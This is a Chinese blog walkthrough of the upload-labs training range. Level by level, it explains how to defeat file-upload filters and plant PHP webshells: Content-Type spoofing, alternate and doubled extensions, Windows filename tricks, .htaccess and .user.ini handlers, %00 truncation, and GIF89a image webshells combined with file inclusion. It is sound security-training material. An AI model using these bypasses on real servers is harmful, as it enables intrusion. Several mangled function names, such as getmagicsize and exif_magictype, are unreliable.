<!DOCTYPE html>
<html lang="en">

<!-- Head tag -->
<head>

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!--Description-->
    
        <meta name="description" content="环境
apache2.4
php5.2 和 php7.3 （有些关需要版本不一样）
webshell 菜刀 （蚁剑低版本php不懂啥原因连不上）       
#0x01先上传一个fox.php的木马文件，发现被拦截下来该文件不允许上传，请上传.jpg|.png|.gif类型的文件,当前文件类型为：">
    

    <!--Author-->
    
        <meta name="author" content="0xEaS">
    

    <!--Open Graph Title-->
    
        <meta property="og:title" content="Uplaod-labs"/>
    

    <!--Open Graph Description-->
    

    <!--Open Graph Site Name-->
    <meta property="og:site_name" content="船到桥头自然直"/>

    <!--Type page-->
    
        <meta property="og:type" content="article" />
    

    <!--Page Cover-->
    

    
        <meta name="twitter:card" content="summary" />
    
    
    

    <!-- Title -->
    
    <title>Uplaod-labs - 船到桥头自然直</title>

    <!-- Bootstrap Core CSS -->
    <link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0-alpha.2/css/bootstrap.min.css" integrity="sha384-y3tfxAZXuh4HwSYylfB+J125MxIs6mR5FOHamPBG064zB+AFeWH94NdvaCBm8qnd" crossorigin="anonymous">

    <!-- Custom Fonts -->
    <link href="//maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" type="text/css">

    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
        <script src="//oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
        <script src="//oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
    <![endif]-->

    <!-- Gallery -->
    <link href="//cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.css" type="text/css" rel="stylesheet" />

    <!-- Custom CSS -->
    
<link rel="stylesheet" href="/css/style.css">


    <!-- Google Analytics -->
    


<meta name="generator" content="Hexo 5.2.0"><link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>


<body>

<div class="bg-gradient"></div>
<div class="bg-pattern"></div>

<!-- Menu -->
<!--Menu Links and Overlay-->
<div class="menu-bg">
    <div class="menu-container">
        <ul>
            
            <li class="menu-item">
                <a href="/">
                    Home
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/archives">
                    Archives
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/about.html">
                    About
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/tags">
                    Tags
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/categories">
                    Categories
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/contact.html">
                    Contact
                </a>
            </li>
            
        </ul>
    </div>
</div>

<!--Hamburger Icon-->
<nav>
    <a href="#menu"></a>
</nav>

<div class="container">

    <!-- Main Content -->
    <div class="row">
    <div class="col-sm-12">

        <!--Title and Logo-->
        <header>
    <div class="logo">
        <a href="/"><i class="logo-icon fa fa-cube" aria-hidden="true"></i></a>
        
    </div>
</header>

        <section class="main">
            
<div class="post">

    <div class="post-header">
        <h1 class="title">
            <a href="/2020/12/22/Uplaod-labs/">
                Uplaod-labs
            </a>
        </h1>
        <div class="post-info">
            
                <span class="date">2020-12-22</span>
            
            
            
        </div>
    </div>

    <div class="content">

        <!-- Gallery -->
        

        <!-- Post Content -->
        <p>   环境</p>
<p>apache2.4</p>
<p>php5.2 和 php7.3 （有些关需要版本不一样）</p>
<p>webshell 菜刀 （蚁剑低版本php不懂啥原因连不上）       </p>
<h3 id="0x01"><a href="#0x01" class="headerlink" title="#0x01"></a>#0x01</h3><p>先上传一个fox.php的木马文件，发现被拦截下来<u><em>该文件不允许上传，请上传.jpg|.png|.gif类型的文件,当前文件类型为：.php</em></u>。尝试挂burp修改http请求包。</p>
<p>发现并没有流量产生就被拦截下来，所以应该是在前端就对文件格式进行了验证。</p>
<p>按F12调出开发者模式。搜索form</p>
<pre class=" language-php"><code class="language-php"><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>form</span> <span class="token attr-name">enctype</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>multipart/form-data<span class="token punctuation">"</span></span> <span class="token attr-name">method</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>post<span class="token punctuation">"</span></span> <span class="token attr-name">onsubmit</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>return checkFile()<span class="token punctuation">"</span></span><span class="token punctuation">></span></span></span>
  <span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>p</span><span class="token punctuation">></span></span></span>请选择要上传的图片：<span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>p</span><span class="token punctuation">></span></span></span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>p</span><span class="token punctuation">></span></span></span>
  <span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>input</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>input_file<span class="token punctuation">"</span></span> <span class="token attr-name">type</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>file<span class="token punctuation">"</span></span> <span class="token attr-name">name</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>upload_file<span class="token punctuation">"</span></span><span class="token punctuation">></span></span></span>
  <span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>input</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>button<span class="token punctuation">"</span></span> <span class="token attr-name">type</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>submit<span class="token punctuation">"</span></span> <span class="token attr-name">name</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>submit<span class="token punctuation">"</span></span> <span class="token attr-name">value</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>上传<span class="token punctuation">"</span></span><span class="token punctuation">></span></span></span>
  <span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>p</span><span class="token punctuation">></span></span></span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>form</span><span class="token punctuation">></span></span></span></code></pre>
<p>看到这里有个触发事件onsubmit=”return checkFile()” 点击提交就会触发，发现会返回checkFile()函数最后return的内容来验证。</p>
<p> 在《script type=”text/javascript”》发现checkFile函数对上传文件进行了后缀名的验证。</p>
<pre class=" language-php"><code class="language-php">  <span class="token keyword">function</span> <span class="token function">checkFile</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token operator">&amp;</span><span class="token shell-comment comment">#123;</span>
        <span class="token keyword">var</span> file <span class="token operator">=</span> document<span class="token punctuation">.</span><span class="token function">getElementsByName</span><span class="token punctuation">(</span><span class="token string">'upload_file'</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">.</span>value<span class="token punctuation">;</span>
        <span class="token keyword">if</span> <span class="token punctuation">(</span>file <span class="token operator">==</span> <span class="token keyword">null</span> <span class="token operator">||</span> file <span class="token operator">==</span> <span class="token string">""</span><span class="token punctuation">)</span> <span class="token operator">&amp;</span><span class="token shell-comment comment">#123;</span>
            <span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">"请选择要上传的文件!"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token keyword">return</span> <span class="token boolean">false</span><span class="token punctuation">;</span>
        <span class="token operator">&amp;</span><span class="token shell-comment comment">#125;</span>
        <span class="token comment" spellcheck="true">//定义允许上传的文件类型</span>
        <span class="token keyword">var</span> allow_ext <span class="token operator">=</span> <span class="token string">".jpg|.png|.gif"</span><span class="token punctuation">;</span>
        <span class="token comment" spellcheck="true">//提取上传文件的类型</span>
        <span class="token keyword">var</span> ext_name <span class="token operator">=</span> file<span class="token punctuation">.</span><span class="token function">substring</span><span class="token punctuation">(</span>file<span class="token punctuation">.</span><span class="token function">lastIndexOf</span><span class="token punctuation">(</span><span class="token string">"."</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token comment" spellcheck="true">//判断上传文件类型是否允许上传</span>
        <span class="token keyword">if</span> <span class="token punctuation">(</span>allow_ext<span class="token punctuation">.</span><span class="token function">indexOf</span><span class="token punctuation">(</span>ext_name<span class="token punctuation">)</span> <span class="token operator">==</span> <span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">)</span> <span class="token operator">&amp;</span><span class="token shell-comment comment">#123;</span>
            <span class="token keyword">var</span> errMsg <span class="token operator">=</span> <span class="token string">"该文件不允许上传，请上传"</span> <span class="token operator">+</span> allow_ext <span class="token operator">+</span> <span class="token string">"类型的文件,当前文件类型为："</span> <span class="token operator">+</span> ext_name<span class="token punctuation">;</span>
            <span class="token function">alert</span><span class="token punctuation">(</span>errMsg<span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token keyword">return</span> <span class="token boolean">false</span><span class="token punctuation">;</span>
        <span class="token operator">&amp;</span><span class="token shell-comment comment">#125;</span>
    <span class="token operator">&amp;</span><span class="token shell-comment comment">#125;</span></code></pre>
<p>函数知识补充：</p>
<p>#document.getElementsByname(name[必须])</p>
<p>该方法与 getElementById() 方法相似，但是它查询元素的 name 属性，而不是 id 属性。</p>
<p>getElementsByName() 方法返回的是元素的数组，而不是一个元素。</p>
<p>#string.lastIndexOf(searchvalue[必须，要检索的字符],start[可选，说明说第几个位置开始，没写默认从0开始])</p>
<p>如果没有匹配到返回 -1</p>
<p>该方法与string.indexOf()相似，一个是找字符最早出现的位置，一个是最后出现的位置。</p>
<p>#string.subsrting(from[必须，表示要开始提前字符串的初始位置],to[可选，没写默认从from开始到结尾])</p>
<p>接下来看看如何绕过：</p>
<p>#删除onsubmit事件，绕过验证机制。</p>
<p>#修改验证函数，把return flase，改成return true。</p>
<p>#把整个验证函数删除。</p>
<p>#先传个后最为.jpg的文件。绕过验证，再用burp拦截下来，修改后缀为.php。</p>
<p>#修改白名单添加|.php|,绕过验证。</p>
<p>最后通过菜刀或者蚁剑连接上webshell。</p>
<h3 id="0x02"><a href="#0x02" class="headerlink" title="#0x02"></a>#0x02</h3><p>试着上传一个.php的文件。发现*<u>提示：文件类型不正确，请重新上传！</u>*</p>
<p>这关应该是拦截文件类型，是在服务器端进行拦截。</p>
<p>函数知识补充：</p>
<p>#file_exists(path[必须])函数检查文件或目录是否存在。存在返回ture，反之返回flase。</p>
<p>#$_FILES是一个数组变量</p>
<pre class=" language-php"><code class="language-php"><span class="token variable">$_FILES</span><span class="token punctuation">[</span><span class="token string">'file'</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">'name'</span><span class="token punctuation">]</span> 客户端文件的原名称。 
<span class="token variable">$_FILES</span><span class="token punctuation">[</span><span class="token string">'file'</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">'type'</span><span class="token punctuation">]</span> 文件的 <span class="token constant">MIME</span> 类型，需要浏览器提供该信息的支持，例如<span class="token string">"image/gif"</span>。 
<span class="token variable">$_FILES</span><span class="token punctuation">[</span><span class="token string">'file'</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">'size'</span><span class="token punctuation">]</span> 已上传文件的大小，单位为字节。 
<span class="token variable">$_FILES</span><span class="token punctuation">[</span><span class="token string">'file'</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">'tmp_name'</span><span class="token punctuation">]</span> 文件被上传后在服务端储存的临时文件名，一般是系统默认。</code></pre>
<p>#move_uploaded_file(file[必须，要移动的文件],newloc[必须，要移动到的新的位置的信息])</p>
<p>接下来看看如何绕过：</p>
<p>#上传.php的木马文件，用burp拦截下来，修改content-type 为：image/jpeg。</p>
<h3 id="0x03"><a href="#0x03" class="headerlink" title="#0x03"></a>#0x03</h3><p>上传一个木马文件，发现*<u>提示：不允许上传.asp,.aspx,.php,.jsp后缀文件！</u>*</p>
<p>函数知识补充：</p>
<p>#trim(string[必须，要检测的字符串],charlist[可选，指定要删除字符串中的哪些字符])</p>
<p>如果没填charlist默认删除</p>
<ul>
<li>“\0” - NULL</li>
<li>“\t” - 制表符</li>
<li>“\n” - 换行</li>
<li>“\x0B” - 垂直制表符</li>
<li>“\r” - 回车</li>
<li>“ “ - 空格</li>
</ul>
<p>#deldot()删除文件名末尾的点</p>
<p>注：这个函数没查到，不太确定。</p>
<p>#strrchr(string[必须，要检查的字符串],char[必须，要查找的字符])</p>
<p>返回从该字符开始一直到末尾的字符串。</p>
<p>注：如果char参数用数字表示，则自动匹配数字 ASCII 值的字符。</p>
<p>#strtolower(string[必须,把字符串转化为小写])</p>
<p>#str_ireplace(find[必须，要查找的内容],replace[必须，要替换的内容],string[必须，要检查的字符串])</p>
<p>#in_array(search[必须，要在数组中搜索的值],array[必须，要搜索的数组],type[可选])</p>
<p>如果search存在在array中，返回true，反之返回flase。</p>
<p>下面看看怎么绕过：</p>
<p>#这里是用黑名单进行过滤，但却没有过滤php3 php5 phml 等</p>
<p>所以可以上传后缀为php3的文件进行解析绕过。</p>
<p>注：需要将apache配置文件中AddType X-application/http-php php3 php5 phtml 前面的#去掉，再重启下才能复现。</p>
<p>而且最好apache服务器版本低点，版本太高可能复现不了。</p>
<h3 id="0x04（我没复现成功，需要把apache的版本降低才行）"><a href="#0x04（我没复现成功，需要把apache的版本降低才行）" class="headerlink" title="#0x04（我没复现成功，需要把apache的版本降低才行）"></a>#0x04（我没复现成功，需要把apache的版本降低才行）</h3><p>查看提示，过滤了好多后缀。但是没有过滤 .htaccess文件。</p>
<p>写一个内容为以下内容的.htaccess文件，就可把上传的1.jpg图片按php文件进行解析。</p>
<pre class=" language-php"><code class="language-php"><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>FirlesMatch</span> <span class="token attr-name">"1.jpg"</span><span class="token punctuation">></span></span></span>
SetHandler application<span class="token operator">/</span>x<span class="token operator">-</span>httpd<span class="token operator">-</span>php 
<span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>FilesMatch</span><span class="token punctuation">></span></span></span></code></pre>
<p>使用之前要把apache配置文件里AllowOverride设置为All</p>
<p>LoadModule rewrite_module modules/mod_rewrite.so 前面的#删除。重启服务器</p>
<p>知识补充：</p>
<p>#.htaccess文件</p>
<p>.htaccess文件是apache的分布式配置文件。他负责相关目录下的网页配置，通过.htaccess可以帮我们实现。其实就是把.htaccess里的内容写在apache的配置文件里。</p>
<h3 id="0x05（用php7-3版本）"><a href="#0x05（用php7-3版本）" class="headerlink" title="#0x05（用php7.3版本）"></a>#0x05（用php7.3版本）</h3><p>这关提示目录下存在readme.php文件</p>
<p>这关和第4关类似，上一关是利用apache中间件进行绕过，这关是利用php解析问题进行绕过。</p>
<p>知识补充：</p>
<p>.user.ini 功能和 .htaccess功能类似 一个是apache的，一个的php的配置文件。</p>
<p>绕过成功前提：</p>
<p>#服务端脚本语言是PHP语言</p>
<p>#上传文件的目录下存在其他的php文件</p>
<p>#服务器使用 CGI或者FASTCIG模式</p>
<p>建一个.user.ini 的文件内容为：</p>
<pre class=" language-php"><code class="language-php"> auto_prepend_file<span class="token operator">=</span>pass5<span class="token punctuation">.</span>png</code></pre>
<p>意思是：该目录下的所有php文件都包含pass5.png。</p>
<p>再创建一个名为pass5.png的木马文件上传。（可以先用内容为 &lt;?php phpinfo(); ?》试下）</p>
<p>注：按照大佬的博客是说，官方说上传后5分钟过后才会生效，所以可以直接重启服务器减少时间。</p>
<p>解析pass5.png肯定不行，解析readme.php解析成功。</p>
<p>用菜刀去连接readme.php就行。</p>
<h3 id="0x06-php7-3-如果复现不了，可以去Buu的在线靶场复现。"><a href="#0x06-php7-3-如果复现不了，可以去Buu的在线靶场复现。" class="headerlink" title="#0x06(php7.3)如果复现不了，可以去Buu的在线靶场复现。"></a>#0x06(php7.3)如果复现不了，可以去Buu的在线靶场复现。</h3><p>这关少了个函数</p>
<p>#strtolower()把字符串转为小写，在win系统下对大小写不敏感，会自动变成小写。Liunx系统下则对大小写敏感。</p>
<p>上传木马文件fox.php,用burp拦截请求包，修改为fox.PHP</p>
<h3 id="0x07-php5-2"><a href="#0x07-php5-2" class="headerlink" title="#0x07(php5.2)"></a>#0x07(php5.2)</h3><p>这关少了个函数</p>
<p>#trim()如果还不懂该函数啥意思自行百度！</p>
<p>注：在win系统下呢，如果文件后缀最后面是空格会自动省去。</p>
<p>上传木马文件为fox.php,用burp拦截请求包，修改为fox.php_  [这里 _指的是空格]</p>
<p>这样可以绕过服务端的验证，到达客户端时自动省去空格。</p>
<h3 id="0x08-php5-2"><a href="#0x08-php5-2" class="headerlink" title="#0x08(php5.2)"></a>#0x08(php5.2)</h3><p>这关少了个函数</p>
<p>#deldot()不懂百度！</p>
<p>原理和0x07一样。win系统会省去最后的 .</p>
<h3 id="0x09-php7-3-不行可以去buu在线靶场复现"><a href="#0x09-php7-3-不行可以去buu在线靶场复现" class="headerlink" title="#0x09(php7.3)不行可以去buu在线靶场复现"></a>#0x09(php7.3)不行可以去buu在线靶场复现</h3><p>这里也是利用win系统的特性。没有过滤（：：$DATA)在后缀加：：$DATA就可绕过</p>
<p>07,08,09这三关都是利用win系统独有的特性。所以渗透时，搜集操作系统信息很重要！</p>
<h3 id="0x10"><a href="#0x10" class="headerlink" title="#0x10"></a>#0x10</h3><p>这关是结合前面几关绕过的特点进行总结使用。</p>
<p>burp 拦截进行后缀名拼凑绕过 fox.php.. .（或者其他组合方式win系统下才可以用）</p>
<p>绕过原理，可以把每个函数过滤结果echo出来观察。</p>
<h3 id="0x11"><a href="#0x11" class="headerlink" title="#0x11"></a>#0x11</h3><p>这关是把黑名单里的字符串，替换成空。</p>
<p>这里可以利用SQL注入里的叠加。</p>
<p>#fox.pphphp(这样解析后就变成fox.php)就上传成功</p>
<p>注：不能写成fox.phphpp,不然会被解析成fox.hpp</p>
<h3 id="0x12"><a href="#0x12" class="headerlink" title="#0x12"></a>#0x12</h3><pre class=" language-php"><code class="language-php"><span class="token variable">$img_path</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">'save_path'</span><span class="token punctuation">]</span><span class="token punctuation">.</span><span class="token string">"/"</span><span class="token punctuation">.</span><span class="token function">rand</span><span class="token punctuation">(</span><span class="token number">10</span><span class="token punctuation">,</span> <span class="token number">99</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">date</span><span class="token punctuation">(</span><span class="token string">"YmdHis"</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token string">"."</span><span class="token punctuation">.</span><span class="token variable">$file_ext</span><span class="token punctuation">;</span></code></pre>
<p>这关还有个可控的地方就是 save_path (就是路径可控)</p>
<p>可以使用%00截断。这个%00截断其实和SQL注入里的注释作用是一样的让后面部分没有作用。</p>
<p>那我们可以上传一个代有一句话木马的图片，绕过前面的检测。</p>
<p>在save_path动手脚</p>
<p><img src="/images/13.png"></p>
<p><img src="/images/14.png"></p>
<p>这样就会让原本图片里面的php代码，生成在fox.php这个文件里并写在该目录下。就可以成功绕过上传了。</p>
<p>注：需要把php.ini 配置文件里的 magic_quotes_gpc 设置为Off</p>
<p>不然会自动过滤，会失败。</p>
<h3 id="0x13"><a href="#0x13" class="headerlink" title="#0x13"></a>#0x13</h3><p>和12关没啥区别，没什么好讲的。</p>
<h3 id="0x14"><a href="#0x14" class="headerlink" title="#0x14"></a>#0x14</h3><p>先讲下相对路径</p>
<p>#./表示当前目录下</p>
<p>#../表示上一级目录，就是先移动到上一层目录，再寻找相关文件。</p>
<p>函数知识补充：</p>
<p>#rb 是只读的意思，rb+是读写</p>
<p>#fread(resource $handle , int $length)</p>
<table>
<thead>
<tr>
<th><strong>handle</strong></th>
<th><strong>文件系统指针，是典型地由 fopen() 创建的 resource(资源)。</strong></th>
</tr>
</thead>
<tbody><tr>
<td><strong>length</strong></td>
<td><strong>必需。规定要读取的最大字节数。</strong></td>
</tr>
</tbody></table>
<p>函数会在到达指定长度或读到文件末尾（EOF）时（以先到者为准），停止运行。</p>
<p>该函数返回读取的字符串，如果失败则返回 FALSE。</p>
<p>#unpack(format,data)</p>
<table>
<thead>
<tr>
<th>参数</th>
<th>描述</th>
</tr>
</thead>
<tbody><tr>
<td><em>format</em></td>
<td>必需。规定在解包数据时所使用的格式。</td>
</tr>
<tr>
<td>data</td>
<td>必需。规定被解包的二进制数据。</td>
</tr>
</tbody></table>
<p>返回的是一个数组</p>
<pre class=" language-php"><code class="language-php"><span class="token delimiter">&lt;?php</span>
<span class="token variable">$data</span> <span class="token operator">=</span> <span class="token string">"GIF89a"</span><span class="token punctuation">;</span>
<span class="token function">print_r</span><span class="token punctuation">(</span><span class="token function">unpack</span><span class="token punctuation">(</span><span class="token string">"C2chars"</span><span class="token punctuation">,</span><span class="token variable">$data</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter">?></span> 
<span class="token delimiter">&lt;?php</span>
<span class="token variable">$data</span> <span class="token operator">=</span> <span class="token string">"PHP"</span><span class="token punctuation">;</span>
<span class="token function">print_r</span><span class="token punctuation">(</span><span class="token function">unpack</span><span class="token punctuation">(</span><span class="token string">"Cmyint"</span><span class="token punctuation">,</span><span class="token variable">$data</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter">?></span>
<span class="token delimiter">&lt;?php</span>
<span class="token variable">$data</span> <span class="token operator">=</span> <span class="token string">"PHP"</span><span class="token punctuation">;</span>
<span class="token function">print_r</span><span class="token punctuation">(</span><span class="token function">unpack</span><span class="token punctuation">(</span><span class="token string">"C*"</span><span class="token punctuation">,</span><span class="token variable">$data</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter">?></span> 
<span class="token delimiter">&lt;?php</span>
<span class="token variable">$bin</span> <span class="token operator">=</span> <span class="token function">pack</span><span class="token punctuation">(</span><span class="token string">"c2n2"</span><span class="token punctuation">,</span><span class="token number">0x1234</span><span class="token punctuation">,</span><span class="token number">0x5678</span><span class="token punctuation">,</span><span class="token number">65</span><span class="token punctuation">,</span><span class="token number">66</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">print_r</span><span class="token punctuation">(</span><span class="token function">unpack</span><span class="token punctuation">(</span><span class="token string">"c4chars/n2int"</span><span class="token punctuation">,</span><span class="token variable">$bin</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter">?></span></code></pre>
<pre class=" language-php"><code class="language-php"><span class="token keyword">Array</span>
<span class="token punctuation">(</span>
    <span class="token punctuation">[</span>chars1<span class="token punctuation">]</span> <span class="token operator">=</span><span class="token operator">></span> <span class="token number">71</span>
    <span class="token punctuation">[</span>chars2<span class="token punctuation">]</span> <span class="token operator">=</span><span class="token operator">></span> <span class="token number">73</span>
<span class="token punctuation">)</span>

<span class="token keyword">Array</span>
<span class="token punctuation">(</span>
    <span class="token punctuation">[</span>myint<span class="token punctuation">]</span> <span class="token operator">=</span><span class="token operator">></span> <span class="token number">80</span>
<span class="token punctuation">)</span>
<span class="token keyword">Array</span>
<span class="token punctuation">(</span>
    <span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span> <span class="token operator">=</span><span class="token operator">></span> <span class="token number">80</span>
    <span class="token punctuation">[</span><span class="token number">2</span><span class="token punctuation">]</span> <span class="token operator">=</span><span class="token operator">></span> <span class="token number">72</span>
    <span class="token punctuation">[</span><span class="token number">3</span><span class="token punctuation">]</span> <span class="token operator">=</span><span class="token operator">></span> <span class="token number">80</span>
<span class="token punctuation">)</span>

<span class="token keyword">Array</span>
<span class="token punctuation">(</span>
    <span class="token punctuation">[</span>chars1<span class="token punctuation">]</span> <span class="token operator">=</span><span class="token operator">></span> <span class="token number">52</span>
    <span class="token punctuation">[</span>chars2<span class="token punctuation">]</span> <span class="token operator">=</span><span class="token operator">></span> <span class="token number">120</span>
    <span class="token punctuation">[</span>int1<span class="token punctuation">]</span> <span class="token operator">=</span><span class="token operator">></span> <span class="token number">65</span>
    <span class="token punctuation">[</span>int2<span class="token punctuation">]</span> <span class="token operator">=</span><span class="token operator">></span> <span class="token number">66</span>
<span class="token punctuation">)</span></code></pre>
<p>#这关需要结合文件包含漏洞才能成功。</p>
<p>先制作一个木马图片在头部加GIF89a可以绕过检测。</p>
<p>然后点击靶场自带的文件上传漏洞页面</p>
<p>包含所上传的图片马让它解析成功。</p>
<pre><code>?file=./upload/12325112521.gif</code></pre>
<p>可以先把内容写成phpinfo()看下能否解析成功，再写入一句话木马。</p>
<h3 id="0x15"><a href="#0x15" class="headerlink" title="#0x15"></a>#0x15</h3><p>函数知识补充：</p>
<p>#getmagicsize()</p>
<p>用于获取图像大小及相关信息，成功返回一个数组，失败则返回 FALSE 并产生一条 E_WARNING 级的错误信息。</p>
<pre class=" language-php"><code class="language-php"><span class="token delimiter">&lt;?php</span>
<span class="token variable">$remote_png_url</span> <span class="token operator">=</span> 'http<span class="token punctuation">:</span><span class="token comment" spellcheck="true">//www.runoob.com/wp-content/themes/w3cschool.cc/assets/img/logo-domain-green2.png';</span>
<span class="token variable">$img_data</span> <span class="token operator">=</span> <span class="token function">getimagesize</span><span class="token punctuation">(</span><span class="token variable">$remote_png_url</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">print_r</span><span class="token punctuation">(</span><span class="token variable">$img_data</span> <span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter">?></span></code></pre>
<pre class=" language-php"><code class="language-php"><span class="token keyword">Array</span>
<span class="token punctuation">(</span>
    <span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span> <span class="token operator">=</span><span class="token operator">></span> <span class="token number">290</span>
    <span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span> <span class="token operator">=</span><span class="token operator">></span> <span class="token number">69</span>
    <span class="token punctuation">[</span><span class="token number">2</span><span class="token punctuation">]</span> <span class="token operator">=</span><span class="token operator">></span> <span class="token number">3</span>
    <span class="token punctuation">[</span><span class="token number">3</span><span class="token punctuation">]</span> <span class="token operator">=</span><span class="token operator">></span> width<span class="token operator">=</span><span class="token string">"290"</span> height<span class="token operator">=</span><span class="token string">"69"</span>
    <span class="token punctuation">[</span>bits<span class="token punctuation">]</span> <span class="token operator">=</span><span class="token operator">></span> <span class="token number">8</span>
    <span class="token punctuation">[</span>mime<span class="token punctuation">]</span> <span class="token operator">=</span><span class="token operator">></span> image<span class="token operator">/</span>png
<span class="token punctuation">)</span></code></pre>
<ul>
<li>索引 0 给出的是图像宽度的像素值</li>
<li>索引 1 给出的是图像高度的像素值</li>
<li>索引 2 给出的是图像的类型，返回的是数字，其中1 = GIF，2 = JPG，3 = PNG，4 = SWF，5 = PSD，6 =  BMP，7 = TIFF(intel byte order)，8 = TIFF(motorola byte order)，9 = JPC，10 = JP2，11 = JPX，12 = JB2，13 = SWC，14 = IFF，15 = WBMP，16 = XBM</li>
<li>索引 3 给出的是一个宽度和高度的字符串，可以直接用于 HTML 的 &lt;image标签</li>
<li>索引 bits 给出的是图像的每种颜色的位数，二进制格式</li>
<li>索引 channels 给出的是图像的通道值，RGB 图像默认是 3</li>
<li>索引 mime 给出的是图像的 MIME 信息，此信息可以用来在 HTTP Content-type 头信息中发送正确的信息，如： header(“Content-type: image/jpeg”);</li>
</ul>
<p>#magic_type_to_extesion()</p>
<p>根据指定的图像类型返回对应的后缀名。</p>
<p>#这关的验证的思路和14关类似，添加头部信息GIF89a即可绕过。</p>
<h3 id="0x16"><a href="#0x16" class="headerlink" title="#0x16"></a>#0x16</h3><p>函数知识补充：</p>
<p>#exif_magictype()</p>
<p>读取一个图像的第一个字节并检查其签名。如果发现了恰当的签名则返回一个对应的常量，否则返回 FALSE。</p>
<p><img src="/images/15.png"></p>
<p>注：需打开php_exif 模块，把前面的分号去掉就打开了。</p>
<p>#这关也是换了个函数进行验证，思路和13关一样。</p>
<p>总结下 14，15，16 三关。差别是使用不同的方法对传进来的文件进行信息的验证。</p>
<p>看博客说exif_magictype 比 getmagicsize 验证快的多。</p>
<h3 id="0x17"><a href="#0x17" class="headerlink" title="#0x17"></a>#0x17</h3><p>函数知识补充：</p>
<p>#basename(path,suffix)</p>
<p>函数返回路径中的文件名部分。</p>
<table>
<thead>
<tr>
<th>参数</th>
<th>描述</th>
</tr>
</thead>
<tbody><tr>
<td>path</td>
<td>必需。规定要检查的路径。</td>
</tr>
<tr>
<td>suffix</td>
<td>可选。规定文件扩展名。如果文件有名有文件扩展名，将不会显示这个扩展名。</td>
</tr>
</tbody></table>
<p>#imagecreatefrom__()</p>
<p>该系列函数用于从文件或 URL 载入一幅图像，返回一图像标识符，代表了从给定的文件名取得的图像。失败返回 false。</p>
<p>注：程序通过imagecreatefromjpeg()函数调用了PHP GD库（GD库，是php处理图形的扩展库），对图片进行了转换。</p>
<p>该系列函数有：</p>
<p>imagecreatefromgif()：      创建一块画布，并从 GIF 文件或 URL 地址载入一副图像<br>imagecreatefromjpeg()：   创建一块画布，并从 JPEG 文件或 URL 地址载入一副图像<br>imagecreatefrompng()：    创建一块画布，并从 PNG 文件或 URL 地址载入一副图像<br>imagecreatefromwbmp()：创建一块画布，并从 WBMP 文件或 URL 地址载入一副图像<br>imagecreatefromstring()： 创建一块画布，并从字符串中的图像流新建一副图像</p>
